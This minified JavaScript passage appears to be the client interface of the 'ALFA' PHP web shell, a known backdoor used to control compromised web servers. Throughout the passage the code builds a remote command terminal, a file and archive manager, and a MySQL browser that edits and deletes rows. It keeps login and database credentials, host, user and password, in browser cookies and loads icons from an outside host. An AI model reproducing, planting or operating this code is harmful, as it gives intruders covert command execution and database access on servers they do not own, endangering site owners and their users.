db_target='"+a+"' onclick='alfaMysqlAlterTbl(this);return false;'>Change</button></td></tr>";var m="";switch(e.columns[u].data_type){case"longtext":case"text":m="<textarea name='"+e.columns[u].name+"' rows='5'></textarea>";break;case"int":case"smallint":case"bigint":m="<input type='number' name='"+e.columns[u].name+"' value=''>";break;default:m="<input type='text' name='"+e.columns[u].name+"' value=''>"}r+="<tr><th style='text-align: left;'>"+e.columns[u].name+"</th><td>"+e.columns[u].type+"</td><td>"+m+"</td></tr>"}if(r+="</table><div style='margin-left:20px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"insert\");return false;'>Insert</button></div><div class='mysql-insert-result'></div>",o+="</table><div class='mysql-structure-qres'></div>",n+="</table><div style='padding-left: 384px;margin-top: 15px;'><button tbl_name='"+t+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlSearch(this);return false;'>Search</button></div>",e.pages>0){l+="<span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,1);'><<</span> <span> page: </span> <select tbl_name='"+t+"' db_target='"+a+"' name='mysql-q-pages' db_id='"+i+"' class='db-opt-id' onchange='alfaMysqlChangePage(this);' pages='"+e.pages+"'>";for(var b=1;b<e.pages+1;b++)l+="<option>"+b+"</option>";l+="</select><span> Of "+e.pages+"</span> <span style='cursor:pointer;' db_id='"+i+"' onclick='alfaMysqlChangePage(this,2);'>>></span>"}var y=d.querySelector("#"+i);y.querySelector(".mysql-search-area").innerHTML=n,y.querySelector(".mysql-insert-row").innerHTML=r,y.querySelector(".mysql-edit-row").innerHTML="",y.querySelector(".mysql-structure").innerHTML=o,y.querySelector(".mysql-query-result-header .mysql-query-pager").innerHTML=l,y.querySelector(".mysql-query-table").innerHTML=e.status?e.table:"",alfaMysqlTabCtl({child:1,db_id:i,target:".mysql-query-result-content"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="none",alfaMysqlReportBuilder(i,e)}})}function alfaMysqlAlterTbl(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r=e.getAttribute("col_name"),o={};o.type=i.querySelector(".mysql-structure select[name=sel_"+r+"]").value,o.input=i.querySelector(".mysql-structure input[name=value_"+r+"]").value,alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_alter",db_info:{table:l,column:r,alter:o},post:{alfa2:"alter"}},function(e){var t=d.querySelector("#"+a+" .mysql-structure-qres");t.innerHTML=e,t.style.display="block"})}function alfaMysqlSearch(e){var t=e.getAttribute("db_target"),a=e.getAttribute("db_id"),i=d.querySelector("#"+a),l=e.getAttribute("tbl_name"),r={};i.querySelectorAll(".mysql-search-area input, .mysql-search-area select").forEach(function(e){r.hasOwnProperty(e.name)||(r[e.name]={}),"SELECT"==e.tagName?r[e.name].opt=e.value:r[e.name].value=e.value}),alfaMysqlApi({db_id:a,db_target:t,ajax_id:"mysql_table_search_query",db_info:{table:l,search:r},post:{alfa2:"search"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),alfaMysqlTabCtl({child:1,db_id:a,target:".mysql-query-result-content"},!0),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaMysqlEditRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=(d.querySelector("#"+i),e.getAttribute("col_key")),r=e.getAttribute("key"),o=e.getAttribute("tbl_name"),n=e.getAttribute("row_id");alfaMysqlApi({db_id:i,db_target:a,ajax_id:"mysql_table_edit_query",db_info:{table:o,col_key:l,key:r},post:{alfa2:t}},function(e){if(0!=e.length)if(e=JSON.parse(e),"edit"==t){var s="<table border='1'><tr style='text-align: left;background-color: #305b8e;color:#FFFFFF;'><th>Column</th><th>Type</th><th>Value</th></tr>";for(var c in e){var u="";switch(e[c].type.tag){case"textarea":u="<textarea name='"+e[c].col+"' rows='5'>"+e[c].value+"</textarea>";break;case"input":u="<input type='"+e[c].type.type+"' name='"+e[c].col+"' value='"+e[c].value+"'>"}s+="<tr><th style='text-align: left;'>"+e[c].col+"</th><td>"+e[c].type.col_type+"</td><td>"+u+"</td></tr>"}s+="</table><div style='margin-left:20px;'><button col_key='"+l+"' key='"+r+"' tbl_name='"+o+"' db_id='"+i+"' db_target='"+a+"' onclick='alfaMysqlUpdateRow(this, \"edit\");return false;'>Update</button></div><div class='mysql-update-result'></div>",d.querySelector("#"+i+" .mysql-edit-row").innerHTML=s,alfaMysqlTabCtl({child:6,db_id:i,target:".mysql-edit-row"},!0),d.querySelector("#"+i+" .mysql-query-result-tabs div:nth-child(6)").style.display="inline-block"}else"delete"==t&&(e.status?d.querySelector("#"+i+" .tbl_row_l"+n).remove():alert(e.error))})}function alfaMysqlTblSelectAll(e){var t=e.getAttribute("db_id");d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(t){t.checked=e.checked})}function alfaMysqlDeleteAllSelectedrows(e){var t=e.getAttribute("db_id"),a=e.getAttribute("db_target"),i=e.getAttribute("col_key"),l=e.getAttribute("tbl_name"),r=[];if(d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&r.push(e.value)}),0==r.length)return!1;alfaMysqlApi({db_id:t,db_target:a,ajax_id:"mysql_table_delete_all_query",db_info:{table:l,col_key:i,rows:r},post:{alfa2:"delete_all"}},function(e){if(""!=e)if((e=JSON.parse(e)).status){var a=0,i=d.querySelector("#"+t);d.querySelectorAll("#"+t+" .mysql-main input[name=tbl_rows_checkbox\\[\\]]").forEach(function(e){e.checked&&(a=e.getAttribute("row_id"),i.querySelector(".tbl_row_l"+a).remove())})}else alert(e.error)})}function alfaMysqlUpdateRow(e,t){var a=e.getAttribute("db_target"),i=e.getAttribute("db_id"),l=d.querySelector("#"+i),r=".mysql-insert-row",o=".mysql-insert-result",n="mysql_table_insert_query",s="insert",c={table:e.getAttribute("tbl_name")};if("edit"==t){var u=e.getAttribute("col_key"),p=e.getAttribute("key");r=".mysql-edit-row",o=".mysql-update-result",n="mysql_table_update_query",s="update",c.col_key=u,c.key=p}var f={};l.querySelectorAll(r+" input, "+r+" textarea").forEach(function(e){f.hasOwnProperty(e.name)||(f[e.name]={}),f[e.name]=e.value}),c.data=f,alfaMysqlApi({db_id:i,db_target:a,ajax_id:n,db_info:c,post:{alfa2:s}},function(e){if(0!=e.length){e=JSON.parse(e);var t=d.querySelector("#"+i+" "+o);t.style.display="block",e.status?t.innerHTML="Success...":t.innerHTML=e.error}})}function alfaMysqlLoadDataType(e){e=e.toUpperCase();var t=["INT","VARCHAR","TEXT","DATE",{key:"Numeric",vals:["TINYINT","SMALLINT","MEDIUMINT","INT","BIGINT","-","DECIMAL","FLOAT","DOUBLE","REAL","-","BIT","BOOLEAN","SERIAL"]},{key:"Date and time",vals:["DATE","DATETIME","TIMESTAMP","TIME","YEAR"]},{key:"String",vals:["CHAR","VARCHAR","-","TINYTEXT","TEXT","MEDIUMTEXT","LONGTEXT","-","BINARY","VARBINARY","-","TINYBLOB","MEDIUMBLOB","BLOB","LONGBLOB","-","ENUM","SET"]},{key:"Spatial",vals:["GEOMETRY","POINT","LINESTRING","POLYGON","MULTIPOINT","MULTILINESTRING","MULTIPOLYGON","GEOMETRYCOLLECTION"]},{key:"JSON",vals:["JSON"]}],a="",i=!1;for(var l in t)if("object"==typeof t[l]){for(var r in a+='<optgroup label="'+t[l].key+'">',t[l].vals)a+="<option"+(t[l].vals[r]!=e||i?"":" selected")+">"+t[l].vals[r]+"</option>",t[l].vals[r]==e&&(i=!0);a+="</optgroup>"}else a+="<option"+(t[l]!=e||i?"":" selected")+">"+t[l]+"</option>",t[l]==e&&(i=!0);return a}function alfaMysqlChangePage(e,t){var a=e.getAttribute("db_id"),i=0;if(void 0!==t){e=d.querySelector("#"+a+" select[name=mysql-q-pages]");var l=parseInt(e.getAttribute("pages"));if(i=parseInt(e.value),1==t?--i:++i,0==i||l<i)return!1;e.value=i}else i=e.value;var r=e.getAttribute("db_target"),o=e.getAttribute("tbl_name");alfaMysqlApi({db_id:a,db_target:r,ajax_id:"mysql_table_change_page",db_info:{table:o,page:i},post:{alfa2:"page"}},function(e){0!=e.length&&(e=JSON.parse(e),alfaMysqlReportBuilder(a,e),d.querySelector("#"+a+" .mysql-query-table").innerHTML=e.table)})}function alfaRemoveCookie(e){document.cookie=e+"=;Max-Age=0; path=/;"}function alfaLogOut(){alfaRemoveCookie("AlfaUser"),alfaRemoveCookie("AlfaPass"),location.reload()}var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(a){if(""===a||null==a)throw'"msg parameter is empty"';var i=document.querySelector(e),l=document.createElement("DIV"),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("A"),s=document.createElement("div"),c=document.createElement("IMG"),d=this;if(s.style.display="inline-block",s.style.marginRight="10px",r.style.display="inline-block",o.classList.add("alert-content"),o.innerText=a,n.classList.add("alert-close"),n.setAttribute("href","#"),l.classList.add("alert-box"),c.src=this.types[t.type].icon,c.style.width="30px",s.appendChild(c),l.appendChild(s),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,r.appendChild(u)}if(r.appendChild(o),l.appendChild(r),t.hideCloseButton&&void 0!==t.hideCloseButton||l.appendChild(n),t.hasOwnProperty("type")&&l.classList.add(this.types[t.type].class),i.appendChild(l),n.addEventListener("click",function(e){e.preventDefault(),d.hide(l)}),!t.persistent)var p=setTimeout(function(){d.hide(l),clearTimeout(p)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,a,i,l){void 0===a&&(a="success"),void 0===i&&(i=!1),void 0===l&&(l=1e4);var r={closeTime:l,persistent:i,type:a,hideCloseButton:!1};void 0!==t&&(r.title=t),new alfaAlertBox("#alert-area",r).show(e)}function alfaSyncMenuToOpt(e,t){var a="",i="",l=null;void 0!==t?(a="view_archive",i=e,l=location):(a=e.name,i=e.getAttribute("fname"),l=e),"extract"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==a?(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+i),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==a&&(alfa_can_add_opt=!0,l.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+i,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){var t="#filesman_holder_"+alfa_current_fm_id;setTimeout(function(){var a=new RegExp(e.value,"i");d.querySelectorAll(t+" .fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(a)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,a){if($("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var i="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+i+'" opt_id="'+i+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+i+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(i).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",i)});try{$(i).querySelector(".getconfig").setAttribute("base_id",i)}catch(e){}return i}$(t).innerHTML=e;var l=$("tab_"+t);null!=l&&((-1==l.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+l.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=a&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){alfa_before_do_action_id="",$("options_window").style.display="block";var a=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var i="",l=$("menu_opt_"+e).innerHTML;"market"==e?l="Alfa Market":"GetDisFunc"==e&&(l="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=a){var r=a.getAttribute("opt_count");null!=r?(i=parseInt(r)+1,a.setAttribute("opt_count",i)):(i=1,a.setAttribute("opt_count",i))}var o="option_"+e+i;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+o+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+o+'" onclick="optionsTabController(this);" title="'+l+'" id="tab_'+o+'" class="tab_name tab_is_active">'+l+' <img opt_id="'+o+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(o).classList.toggle("option_is_active"),d.querySelectorAll("#"+o+" form, #"+o+" a").forEach(function(t){if("getconfig"==t.classList.value)return!1;if("FORM"==t.tagName){var a=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+i+'");'+a),t.setAttribute("opt_id",e+i)}else{a=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+i+'");'+a)}});try{$(o).querySelector(".getconfig").setAttribute("base_id",e+i)}catch(e){}return e+i}a.innerHTML=t;var n=$("tab_option_"+e);null!=n&&((-1==n.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(n.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",n.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){if("getconfig"==t.classList.value)return!1;if("FORM"==t.tagName){var a=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+'");'+a),t.setAttribute("opt_id",e)}else{a=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+'");'+a)}});try{a.querySelector(".getconfig").setAttribute("base_id",e)}catch(e){}options_window_is_minimized||(d.body.style.overflow="hidden")}function alfaBeforeDoAction(e){alfa_before_do_action_id=e}function alfaLoaderOnTop(e){$("a_loader").style.display=e,d.body.style.overflow="block"==e?"hidden":"visible"}function alfaAjaxController(e){var t=e.getAttribute("parent");$("loader_"+t).remove(),"filesman_holder"==t.substr(0,15)&&($(t).style.minHeight="0"),_ALFA_AJAX_.hasOwnProperty(t)&&_ALFA_AJAX_[t].abort()}function closeDatabase(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("sql-active-tab"))if((e=d.querySelectorAll(".sql-tabs .sql-tabname")).length>1){e[0].classList.add("sql-active-tab");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("sql-active-content")}else editorClose("database_window");d.querySelector("div[opt_id="+a+"]").remove()}function closeFmTab(e,t){t.stopPropagation();var a=e.getAttribute("fm_id"),i=$("filesman_tab_"+a);if(-1!=i.classList.value.indexOf("filesman-tab-active")&&(e=d.querySelectorAll("#filesman_tabs .filesman_tab")).length>1){e[0].classList.add("filesman-tab-active");var l=e[0].getAttribute("fm_id"),r="filesman_holder_"+l;if(null!=$(r)){$(r).classList.toggle("filesman-active-content");var o=$("filesman_tab_"+l).getAttribute("path");initDir(o),d.mf.c.value=o,alfa_current_fm_id=l}}i.remove(),$("filesman_holder_"+a).remove(),alfaFilesmanTabHideTitle()}function closeOption(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("tab_is_active"))if((e=d.querySelectorAll(".options_tab .tab_name")).length>1){e[0].classList.add("tab_is_active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("option_is_active")}else editorClose("options_window");d.querySelector("div[opt_id="+a+"]").remove()}function historyPanelController(e){"hidden"==e.getAttribute("mode")?(d.querySelector(".editor-explorer").style.display="block",d.querySelector(".editor-modal").style.marginLeft="20%",e.setAttribute("mode","visible"),e.style.left="19%",e.innerHTML="<<"):(d.querySelector(".editor-explorer").style.display="none",d.querySelector(".editor-modal").style.marginLeft="1%",e.setAttribute("mode","hidden"),e.style.left="0%",e.innerHTML=">>")}function closeTerminalContent(e,t){t.stopPropagation();var a=e.getAttribute("term_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("active-terminal-tab"))&&(e=d.querySelectorAll(".terminal-tabs .terminal-tab")).length>1){e[0].classList.add("active-terminal-tab");var i=e[0].getAttribute("term_id");null!=$(i)&&$(i).classList.toggle("active-terminal-content")}d.querySelector("div[term_id="+a+"]").remove()}function closeEditorContent(e,t){t.stopPropagation();var a=e.getAttribute("opt_id");if(($(a).remove(),-1!=$("tab_"+a).classList.value.indexOf("editor-tab-active"))&&(e=d.querySelectorAll(".editor-tabs .editor-tab-name")).length>1){e[0].classList.add("editor-tab-active");var i=e[0].getAttribute("opt_id");null!=$(i)&&$(i).classList.toggle("editor-content-active")}d.querySelector("div[opt_id="+a+"]").remove()}function optionsTabController(e){try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("option_is_active");try{d.querySelector("#options_window .content_options_holder .options_tab \t.tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("tab_is_active"),d.querySelector(".opt-title").innerHTML=e.getAttribute("title"),alfaUpdateOptionsBadge("options_window")}function terminalTabController(e){try{d.querySelector(".terminal-tab.active-terminal-tab").classList.remove("active-terminal-tab")}catch(e){}try{d.querySelector(".terminal-content.active-terminal-content").classList.remove("active-terminal-content")}catch(e){}var t=e.getAttribute("term_id");if(null==t)return!1;$(t).classList.toggle("active-terminal-content"),e.classList.remove("tab-is-done"),e.classList.add("active-terminal-tab"),$(t).querySelector(".php-terminal-input").focus(),alfaUpdateOptionsBadge("cgiloader")}function filesmanTabController(e){try{d.querySelector(".ajaxarea.filesman-active-content").classList.remove("filesman-active-content")}catch(e){}try{d.querySelector(".filesman_tab.filesman-tab-active").classList.remove("filesman-tab-active")}catch(e){}var t=e.getAttribute("fm_id");if(null==t)return!1;alfa_current_fm_id=t,e.classList.add("filesman-tab-active"),e.classList.remove("tab-is-done"),$("filesman_holder_"+t).classList.toggle("filesman-active-content");var a=e.getAttribute("path");initDir(a),d.mf.c.value=a}function dbTabController(e){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}var t=e.getAttribute("opt_id");if(null==t)return!1;$(t).classList.toggle("sql-active-content"),e.classList.remove("tab-is-done"),e.classList.add("sql-active-tab"),alfaUpdateOptionsBadge("database_window")}function editorTabController(e,t){try{d.querySelector(".editor-contents.editor-content-active").classList.remove("editor-content-active")}catch(e){}var a=null;void 0===t?a=e.getAttribute("opt_id"):(a=e,e=$("tab_"+a));var i=editor_files["file_"+a.replace("editor_source_","")];if(void 0!==i&&(d.querySelector(".editor-path").innerHTML=(i.pwd+"/"+i.file).replace(/\/\//g,"/")),null==a)return!1;$(a).classList.toggle("editor-content-active");try{d.querySelector(".editor-tabs .editor-tab-name.editor-tab-active").classList.remove("editor-tab-active")}catch(e){}e.classList.remove("tab-is-done"),e.classList.add("editor-tab-active"),alfaUpdateOptionsBadge("editor")}function alfaUpdateOptionsBadge(e){var t=d.querySelector("#"+e+"-minimized .options_min_badge");if(null!=t){var a=d.querySelectorAll("#"+e+" .tab-is-done").length;t.innerHTML=a,t.style.visibility=a>0?"visible":"hidden"}}function alfaOpenPhpTerminal(e){if(php_temrinal_using_cgi&&void 0===e)showEditor("cgiloader");else{$("cgiloader").style.display="block",$("cgiloader").style.background="rgba(0, 0, 0, 0.57)",$("cgiframe").style.background="rgba(0, 0, 0, 0.81)",$("cgiframe").style.border="1px solid rgb(30, 86, 115)",$("cgiframe").style.height="90%",$("cgiframe").style.padding="3px",d.querySelector("#cgiloader .opt-title").innerHTML="Terminal";var t="",a="",i="terminal_id_"+getRandom(10);void 0===e&&(t=" active-terminal-content",a=" active-terminal-tab"),d.querySelector("#cgiframe .terminal-contents").insertAdjacentHTML("afterbegin",'<div id="'+i+'" class="terminal-content'+t+'"><div class="php-terminal-output"><div><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+'\',1);">+</button><button class="terminal-btn-fontctl" onClick="changeTerminalFontSize(\''+i+"',0);\">-</button><input onchange=\"alfaTerminalChangecolor(this,'"+i+'\');" style="height: 18px;background: #dde2e2;" type="color"></div><pre class="ml1" style="border:unset;height: 90%;"></pre></div><div><form term_id="'+i+'" onSubmit="alfaExecTerminal(this);this.c.value=\'\';return false;" autocomplete="off" style="margin-top: 10px;"><div style="overflow: auto;white-space: nowrap;"><div style="display: inline-block;color:#4fbec3;margin-bottom:5px;margin-right:5px;">CWD:~# </div><div style="display: inline-block;color:#42ec42;" class="php-terminal-current-dir"></div></div><div style="position:relative;"><span style="color: #00ff08;font-size: 25px;">$ </span><input style="padding: 8px;font-size: 20px;width: 67%;border: 1px solid #27979B;padding-right:35px;" onkeyup="alfaWalkInTerminalHistory(this,event,\''+i+'\');" term_id="'+i+'" class="php-terminal-input" type="text" name="c" onfocus="closeHistoryCmd(\'free\',this);" placeholder="ls -la"><button class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;">ExeCute<button term_id="'+i+'" class="button" style="color: #27979B;padding: 12px;margin-left: 10px;border-radius: 2px;font-weight: bolder;" onClick="alfaExecTerminal(this, 1);return false;">Current Dir</button><div class="cmd-history-holder"><div class="commands-history-header">History</div><span onClick="clearTerminalHistory();" style="border-bottom: 1px solid;margin-bottom: 5px;display: inline-block;padding: 5px;color: #59de69;cursor: pointer;">Clear history</span><div style="overflow: auto;height: 82%;" class="commands-history"></div></div><div term_id="'+i+'" class="cmd-history-icon" mode="" onclick="closeHistoryCmd(this);"><img style="width:27px;" src="http://solevisible.com/icons/menu/time2.svg"></div></form></div></div></div>');try{$("terminal_new_tab").remove()}catch(e){}d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="terminalTabController(this);" term_id="'+i+'" id="tab_'+i+'" class="terminal-tab'+a+'">Terminal <img term_id="'+i+'" onclick="closeTerminalContent(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),d.querySelector("#cgiframe .terminal-tabs").insertAdjacentHTML("beforeend",'<div onclick="alfaOpenPhpTerminal(true);" id="terminal_new_tab" style="background-color:#800000;" class="terminal-tab">New Tab +</div>'),terminal_walk_index[i]={index:0,key:-1},d.querySelector("#"+i+" .php-terminal-input").focus(),d.querySelector("#"+i+" .php-terminal-current-dir").innerHTML=c_,d.querySelector("#cgiloader-minimized .minimized-text").innerHTML="Terminal",alfaTerminalSetColorAndSize(i),php_temrinal_using_cgi=!0;var l=alfaGetTerminalHistory();for(var r in l)d.querySelector("#"+i+" .cmd-history-holder .commands-history").insertAdjacentHTML("afterbegin","<div onclick=\"d.querySelector('#"+i+' .php-terminal-input\').value = this.innerHTML;" class="history-cmd-line">'+l[r]+"</div>")}d.body.style.overflow="hidden"}function alfaTerminalSetColorAndSize(e){var t=getCookie("alfa-terminal-color"),a=getCookie("alfa-terminal-fontsize");void 0!==t&&(d.querySelector("#"+e+" pre.ml1").style.color=t),void 0!==a&&(d.querySelector("#"+e+" pre.ml1").style.fontSize=a)}function alfaTerminalChangecolor(e,t){d.querySelector("#"+t+" pre.ml1").style.color=e.value,setCookie("alfa-terminal-color",e.value,2012)}function alfaGetTerminalHistory(e){var t=getCookie("alfa-terminal-history");try{t=JSON.parse(t)}catch(e){t=[]}return void 0!==e&&t.reverse(),t}function changeTerminalFontSize(e,t){var a=d.querySelector("#"+e+" pre.ml1"),i=parseInt(window.getComputedStyle(a,null).getPropertyValue("font-size")),l="";1==t?(l=i+1+"px",a.style.fontSize=l):(l=i-1+"px",a.style.fontSize=l),setCookie("alfa-terminal-fontsize",l,2012)}function alfaWalkInTerminalHistory(e,t,a){var i=t||window.event;if("38"==i.keyCode||"40"==i.keyCode||"37"==i.keyCode||"39"==i.keyCode)switch(i.keyCode){case 38:var l=alfaGetTerminalHistory(!0),r="";0==terminal_walk_index[a].index?(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,void 0!==(r=l[terminal_walk_index[a].index])?(e.value=r,++terminal_walk_index[a].index):(e.value="",terminal_walk_index[a].index=0)):terminal_walk_index[a].index<l.length&&(0==terminal_walk_index[a].key&&++terminal_walk_index[a].index,e.value=l[terminal_walk_index[a].index],++terminal_walk_index[a].index),terminal_walk_index[a].key=1;break;case 40:l=alfaGetTerminalHistory(!0);if(terminal_walk_index[a].index>=0)0!=terminal_walk_index[a].index&&(--terminal_walk_index[a].index,1==terminal_walk_index[a].key&&--terminal_walk_index[a].index),void 0!==(r=l[terminal_walk_index[a].index])?e.value=r:(e.value="",terminal_walk_index[a].index=0);terminal_walk_index[a].key=0;break;default:console.log(i.keyCode)}else terminal_walk_index[a].index=0}function clearTerminalHistory(){d.querySelectorAll(".commands-history").forEach(function(e){e.innerHTML=""}),setCookie("alfa-terminal-history","",2012)}function alfaAceToFullscreen(e){var t=e.getAttribute("ace_id");alfa_ace_editors.editor[t].container.requestFullscreen()}function closeHistoryCmd(e,t){if("free"==e){var a=t.getAttribute("term_id");return e=d.querySelector("#"+a+" .cmd-history-icon"),d.querySelector("#"+a+" .cmd-history-holder").style.visibility="hidden",d.querySelector("#"+a+" .cmd-history-holder").style.opacity="0",e.setAttribute("mode","off"),!1}var i=e.getAttribute("mode"),l=(a=e.getAttribute("term_id"),d.querySelector("#"+a+" .cmd-history-holder"));0==i.length||"off"==i?(l.style.visibility="visible",l.style.opacity="1",e.setAttribute("mode","on")):(l.style.visibility="hidden",l.style.opacity="0",e.setAttribute("mode","off"))}function geEvalAceValue(e){var t=e.querySelector(".php-evals-ace").getAttribute("id");return alfa_ace_editors.eval[t].getValue()}function alfaOpenArchive(e){var t=e.getAttribute("path"),a=e.getAttribute("fname"),i=e.getAttribute("base_id");if(".."==a&&"phar://"!=t.substr(0,7))return!1;var l="a="+alfab64("open_archive_dir")+"&c="+alfab64(c_)+"&alfa1="+alfab64(t)+"&alfa2="+alfab64(i)+"&ajax="+alfab64("true");_Ajax(d.URL,l,function(e){if("0"!=e){$("archive_base_"+i).innerHTML=e;var a=$("archive_dir_"+i).getAttribute("archive_name"),l=$("archive_dir_"+i).getAttribute("archive_full"),r="",o="";if(0!=(t=t.split(a)[1]).length){var n=(t=t.split("/")).length-1;for(var s in 0==t[n].length&&t.splice(n,1),t)0!=t.length&&(o+=t[s]+"/",r+='<a base_id="'+i+'" fname="'+t[s]+'" path="'+l+o+'" onclick="alfaOpenArchive(this);">'+t[s]+"/</a>")}d.querySelector("#archive_dir_"+i+" .archive_pwd_holder").innerHTML=r}},!1,"open_archive_dir")}function alfaDeleteConnectToDb(e){d.querySelectorAll(".dbh_"+e).forEach(function(e){e.remove()}),alfaConnectionHistoryUpdate(e)}function alfaConnectToDb(e,t){var a={};try{a=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}var i=d.querySelector("#"+t+" div.sf");i.querySelector("input[name=sql_host]").value=a[e].host,i.querySelector("input[name=sql_login]").value=a[e].user,i.querySelector("input[name=sql_pass]").value=a[e].pass,(i.querySelector("input[name=sql_base]")?i.querySelector("input[name=sql_base]"):i.querySelector("select[name=sql_base]")).value=a[e].db,i.querySelector("input[name=sql_count]").checked=!0,d.querySelector("#"+t+" div.sf .db-connect-btn").click()}function alfaShowConnectionHistory(e){var t={},a=e.getAttribute("db_id"),i=e.getAttribute("mode");if(rows='<table class="connection-hist-table"><tr><th>*</th><th>Host</th><th>User</th><th>Pass</th><th>Database</th><th>Connect</th><th>Delete</th></tr>',"on"==i){e.setAttribute("mode","off");try{t=JSON.parse(getCookie("alfa_connection_hist"))}catch(e){}var l,r=1;for(l in t){var o=t[l].user+"_"+t[l].db;rows+='<tr 